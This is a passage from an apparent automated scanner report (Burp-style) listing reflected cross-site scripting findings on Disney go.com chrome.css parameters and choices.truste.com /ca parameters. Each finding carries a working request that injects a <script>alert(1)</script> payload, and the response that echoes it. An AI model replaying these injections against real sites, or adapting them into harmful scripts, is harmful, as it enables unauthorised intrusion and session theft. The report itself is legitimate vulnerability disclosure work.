HTTP/1.1 200 OK
Cache-Control: max-age=43200
Date: Mon, 16 May 2011 01:34:31 GMT
Content-Type: text/css; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:34:31 GMT
Server: Microsoft-IIS/6.0
From: DOLDISWEB17
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=D952C2DC-3CBA-42CB-9B90-CD1DC6A6C29F; path=/; expires=Mon, 16-May-2031 01:34:31 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 13:34:31 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 7340
Connection: keep-alive

#gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chromeContainer legend,#gde_chromeContaine
...[SNIP]...
de_chromeContainer th { text-align: left; }#gde_chromeContainer {font-size:11px;width:100%;background:none;position:relative;z-index:100000000;}#gde_chromeContents {margin:0 auto;background-color:#nulle07d2<script>alert(1)</script>792a5655ec9;width:996px;height:48px;}#gde_chromeButtons {margin-top:0;float:left;width:634px;}.gde_chromeExploreButtons {border-bottom:solid 1px #acacac;width:100%;}.gde_chromePlayButtons {height:23px;width:100%;
...[SNIP]...

5.13. http://ahome.disney.go.com/globalelements/chrome.css [styleHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ahome.disney.go.com
Path:   /globalelements/chrome.css

Issue detail

The value of the styleHover request parameter is copied into the HTML document as plain text between tags. The payload caeb3<script>alert(1)</script>2a777733971 was submitted in the styleHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /globalelements/chrome.css?secure=false&IE6=false&styleSet=mediumGray&styleText=null&styleTextHover=null&styleTextSelected=null&styleBackground=null&styleHover=nullcaeb3<script>alert(1)</script>2a777733971&styleMiddleLine=null&styleSelected=null HTTP/1.1
Host: ahome.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; mbox=check#true#1305508873|session#1305508812278-378400#1305510673; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305510612305%3B; s_sess=%20s_cc%3Dtrue%3B%20s_wdpro_lid%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=43200
Date: Mon, 16 May 2011 01:35:28 GMT
Content-Type: text/css; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:35:28 GMT
Server: Microsoft-IIS/6.0
From: DOLDISWEB10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=3FD48562-E5BB-4B43-B1D0-D2B8211B97E1; path=/; expires=Mon, 16-May-2031 01:35:28 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 13:35:28 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 7496
Connection: keep-alive

#gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chromeContainer legend,#gde_chromeContaine
...[SNIP]...
:left;background-image:url('http://a.dolimg.com/en-US/dcom/media/chrome/sprites/chromeSprites.png');background-repeat:no-repeat;background-position:32px 6px;}a.gde_homeLink:hover{background-color:#nullcaeb3<script>alert(1)</script>2a777733971;}#gde_chromeSearch{margin: 16px 1px 0 0;padding:0 0 0 4px;float:right;border:none;width:150px;height:18px;line-height:18px;background-color:#FFFFFF;text-align:left;font-weight:bold;font-size:12px;}.gd
...[SNIP]...

5.14. http://ahome.disney.go.com/globalelements/chrome.css [styleMiddleLine parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ahome.disney.go.com
Path:   /globalelements/chrome.css

Issue detail

The value of the styleMiddleLine request parameter is copied into the HTML document as plain text between tags. The payload f3fbf<script>alert(1)</script>79b4d1ad707 was submitted in the styleMiddleLine parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /globalelements/chrome.css?secure=false&IE6=false&styleSet=mediumGray&styleText=null&styleTextHover=null&styleTextSelected=null&styleBackground=null&styleHover=null&styleMiddleLine=nullf3fbf<script>alert(1)</script>79b4d1ad707&styleSelected=null HTTP/1.1
Host: ahome.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; mbox=check#true#1305508873|session#1305508812278-378400#1305510673; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305510612305%3B; s_sess=%20s_cc%3Dtrue%3B%20s_wdpro_lid%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=43200
Date: Mon, 16 May 2011 01:36:19 GMT
Content-Type: text/css; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:36:19 GMT
Server: Microsoft-IIS/6.0
From: DOLDISWEB14
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=FA3E265E-A72E-45E9-B6EC-E7801FA9AEF1; path=/; expires=Mon, 16-May-2031 01:36:19 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 13:36:19 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 7340
Connection: keep-alive

#gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chromeContainer legend,#gde_chromeContaine
...[SNIP]...
0;}#gde_chromeContents {margin:0 auto;background-color:#868686;width:996px;height:48px;}#gde_chromeButtons {margin-top:0;float:left;width:634px;}.gde_chromeExploreButtons {border-bottom:solid 1px #nullf3fbf<script>alert(1)</script>79b4d1ad707;width:100%;}.gde_chromePlayButtons {height:23px;width:100%;}.gde_chromeButtonTD{width:400px;}.gde_chromeButtonContents a {outline: none;white-space: nowrap;cursor:hand;text-align:center;}.gde_homeLink
...[SNIP]...

5.15. http://ahome.disney.go.com/globalelements/chrome.css [styleSelected parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ahome.disney.go.com
Path:   /globalelements/chrome.css

Issue detail

The value of the styleSelected request parameter is copied into the HTML document as plain text between tags. The payload 624d5<script>alert(1)</script>d2c80c7c004 was submitted in the styleSelected parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /globalelements/chrome.css?secure=false&IE6=false&styleSet=mediumGray&styleText=null&styleTextHover=null&styleTextSelected=null&styleBackground=null&styleHover=null&styleMiddleLine=null&styleSelected=null624d5<script>alert(1)</script>d2c80c7c004 HTTP/1.1
Host: ahome.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; mbox=check#true#1305508873|session#1305508812278-378400#1305510673; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305510612305%3B; s_sess=%20s_cc%3Dtrue%3B%20s_wdpro_lid%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=43200
Date: Mon, 16 May 2011 01:37:06 GMT
Content-Type: text/css; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:37:06 GMT
Server: Microsoft-IIS/6.0
From: DOLDISWEB10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=B07D636C-D39C-4932-8172-E85B90321B74; path=/; expires=Mon, 16-May-2031 01:37:06 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 13:37:06 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 7379
Connection: keep-alive

#gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chromeContainer legend,#gde_chromeContaine
...[SNIP]...
t:bold;}a.gde_chromeExploreButtonSelected, a.gde_chromeExploreButtonSelected:link, a.gde_chromeExploreButtonSelected:visited{width:100%;line-height:23px;height:24px;display:block;background-color:#null624d5<script>alert(1)</script>d2c80c7c004;color:#ffffff;text-decoration:none;font-size:11px;font-weight:bold;}a.gde_chromeExploreButton:hover{background-color:#acacac;color:#ffffff;}a.gde_chromeExploreButtonSelected:hover{background-color:#ac
...[SNIP]...

5.16. http://ahome.disney.go.com/globalelements/chrome.css [styleText parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ahome.disney.go.com
Path:   /globalelements/chrome.css

Issue detail

The value of the styleText request parameter is copied into the HTML document as plain text between tags. The payload 22159<script>alert(1)</script>8b3f9e779e5 was submitted in the styleText parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /globalelements/chrome.css?secure=false&IE6=false&styleSet=mediumGray&styleText=null22159<script>alert(1)</script>8b3f9e779e5&styleTextHover=null&styleTextSelected=null&styleBackground=null&styleHover=null&styleMiddleLine=null&styleSelected=null HTTP/1.1
Host: ahome.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; mbox=check#true#1305508873|session#1305508812278-378400#1305510673; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305510612305%3B; s_sess=%20s_cc%3Dtrue%3B%20s_wdpro_lid%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=43200
Date: Mon, 16 May 2011 01:31:47 GMT
Content-Type: text/css; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:31:47 GMT
Server: Microsoft-IIS/6.0
From: DOLDISWEB10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=1DD3D030-C717-4860-AEFF-7A704C947B05; path=/; expires=Mon, 16-May-2031 01:31:47 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 13:31:47 GMT
X-UA-COMPATIBLE: IE=EmulateIE7
Content-Length: 7379
Connection: keep-alive

#gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chromeContainer legend,#gde_chromeContaine
...[SNIP]...
rrowButton:hover{background-color:#acacac;}a.gde_chromeExploreButton, a.gde_chromeExploreButton:link, a.gde_chromeExploreButton:visited{width:100%;line-height:23px;height:24px;display:block;color:#null22159<script>alert(1)</script>8b3f9e779e5;text-decoration:none;font-size:11px;font-weight:bold;}a.gde_chromeExploreButtonSelected, a.gde_chromeExploreButtonSelected:link, a.gde_chromeExploreButtonSelected:visited{width:100%;line-height:23px;h
...[SNIP]...

5.17. http://ahome.disney.go.com/globalelements/chrome.css [styleTextHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ahome.disney.go.com
Path:   /globalelements/chrome.css

Issue detail

The value of the styleTextHover request parameter is copied into the HTML document as plain text between tags. The payload 77a2d<script>alert(1)</script>f064bac5f03 was submitted in the styleTextHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /globalelements/chrome.css?secure=false&IE6=false&styleSet=mediumGray&styleText=null&styleTextHover=null77a2d<script>alert(1)</script>f064bac5f03&styleTextSelected=null&styleBackground=null&styleHover=null&styleMiddleLine=null&styleSelected=null HTTP/1.1
Host: ahome.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; mbox=check#true#1305508873|session#1305508812278-378400#1305510673; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305510612305%3B; s_sess=%20s_cc%3Dtrue%3B%20s_wdpro_lid%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=43200
Date: Mon, 16 May 2011 01:32:45 GMT
Content-Type: text/css; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:32:45 GMT
Server: Microsoft-IIS/6.0
From: DOLDISWEB10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=2FC77E24-DC4C-42B8-B47C-38DEC7DE0BDE; path=/; expires=Mon, 16-May-2031 01:32:45 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 13:32:45 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 7418
Connection: keep-alive

#gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chromeContainer legend,#gde_chromeContaine
...[SNIP]...
e-height:23px;height:24px;display:block;background-color:#acacac;color:#ffffff;text-decoration:none;font-size:11px;font-weight:bold;}a.gde_chromeExploreButton:hover{background-color:#acacac;color:#null77a2d<script>alert(1)</script>f064bac5f03;}a.gde_chromeExploreButtonSelected:hover{background-color:#acacac;color:#null77a2d<script>
...[SNIP]...

5.18. http://ahome.disney.go.com/globalelements/chrome.css [styleTextSelected parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ahome.disney.go.com
Path:   /globalelements/chrome.css

Issue detail

The value of the styleTextSelected request parameter is copied into the HTML document as plain text between tags. The payload 6f590<script>alert(1)</script>b6bc8f7735 was submitted in the styleTextSelected parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /globalelements/chrome.css?secure=false&IE6=false&styleSet=mediumGray&styleText=null&styleTextHover=null&styleTextSelected=null6f590<script>alert(1)</script>b6bc8f7735&styleBackground=null&styleHover=null&styleMiddleLine=null&styleSelected=null HTTP/1.1
Host: ahome.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; mbox=check#true#1305508873|session#1305508812278-378400#1305510673; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305510612305%3B; s_sess=%20s_cc%3Dtrue%3B%20s_wdpro_lid%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=43200
Date: Mon, 16 May 2011 01:33:42 GMT
Content-Type: text/css; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:33:42 GMT
Server: Microsoft-IIS/6.0
From: DOLDISWEB17
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=6F96A674-2F26-47A6-A25C-B1C1B941123A; path=/; expires=Mon, 16-May-2031 01:33:42 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 13:33:42 GMT
Content-Length: 7415
Connection: keep-alive

#gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chromeContainer legend,#gde_chromeContaine
...[SNIP]...
chromeExploreButtonSelected, a.gde_chromeExploreButtonSelected:link, a.gde_chromeExploreButtonSelected:visited{width:100%;line-height:23px;height:24px;display:block;background-color:#acacac;color:#null6f590<script>alert(1)</script>b6bc8f7735;text-decoration:none;font-size:11px;font-weight:bold;}a.gde_chromeExploreButton:hover{background-color:#acacac;color:#ffffff;}a.gde_chromeExploreButtonSelected:hover{background-color:#acacac;color:#ff
...[SNIP]...

5.19. http://choices.truste.com/ca [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload d79df<script>alert(1)</script>bd6ec20411 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1f4061%3Cscript%3Ealert(1)%3C/script%3Ed96264b56bdd79df<script>alert(1)</script>bd6ec20411&w=300&h=250&zi=10002&plc=tr HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/5

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:19:00 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4991

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</script>d96264b56bdd79df<script>alert(1)</script>bd6ec20411_ib = '<div id="te-clr1-att01cont1f4061<script>
...[SNIP]...

5.20. http://choices.truste.com/ca [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload f8c30<script>alert(1)</script>184723fc829 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1f4061%3Cscript%3Ealert(1)%3C/script%3Ed96264b56bd&w=300&h=250f8c30<script>alert(1)</script>184723fc829&zi=10002&plc=tr HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/5

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:19:00 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4571

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</script>d96264b56bd-anch','width':300,'height':250f8c30<script>alert(1)</script>184723fc829,'ox':0,'oy':0,'plc':'tr','iplc':'rel','intDivName':'te-clr1-att01cont1f4061<script>
...[SNIP]...

5.21. http://choices.truste.com/ca [plc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload 6c2e5<script>alert(1)</script>c1db2d67ea7 was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1f4061%3Cscript%3Ealert(1)%3C/script%3Ed96264b56bd&w=300&h=250&zi=10002&plc=tr6c2e5<script>alert(1)</script>c1db2d67ea7 HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/5

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:19:00 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4512

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</script>d96264b56bd-anch','width':300,'height':250,'ox':0,'oy':0,'plc':'tr6c2e5<script>alert(1)</script>c1db2d67ea7','iplc':'rel','intDivName':'te-clr1-att01cont1f4061<script>
...[SNIP]...

5.22. http://choices.truste.com/ca [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the w request parameter is copied into the HTML document as plain text between tags. The payload 15459<script>alert(1)</script>7675ee448ea was submitted in the w parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1f4061%3Cscript%3Ealert(1)%3C/script%3Ed96264b56bd&w=30015459<script>alert(1)</script>7675ee448ea&h=250&zi=10002&plc=tr HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/5

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:19:00 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4571

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</script>d96264b56bd-anch','width':30015459<script>alert(1)</script>7675ee448ea,'height':250,'ox':0,'oy':0,'plc':'tr','iplc':'rel','intDivName':'te-clr1-att01cont1f4061<script>
...[SNIP]...

5.23. http://choices.truste.com/ca [zi parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload c8d63<script>alert(1)</script>12ddf7e69dc was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1f4061%3Cscript%3Ealert(1)%3C/script%3Ed96264b56bd&w=300&h=250&zi=10002c8d63<script>alert(1)</script>12ddf7e69dc&plc=tr HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/5

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:19:00 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4512

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</script>d96264b56bd_bi)','icon':'http://choices.truste.com/assets/admarker.png','icon_cam':'http://choices.truste.com/assets/adicon.png','iconText':'','aid':'att01','pid':'mec01','zindex':'10002c8d63<script>alert(1)</script>12ddf7e69dc','cam':'2'};

   var tecabaseurl = 'choices.truste.com';

   truste.ca.addEvent(window, 'load', function() {
       if(!truste.defjsload) {
           var element = document.createElement('script');
           element.src = '
...[SNIP]...

5.24. http://dcl.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl.wdpromedia.com
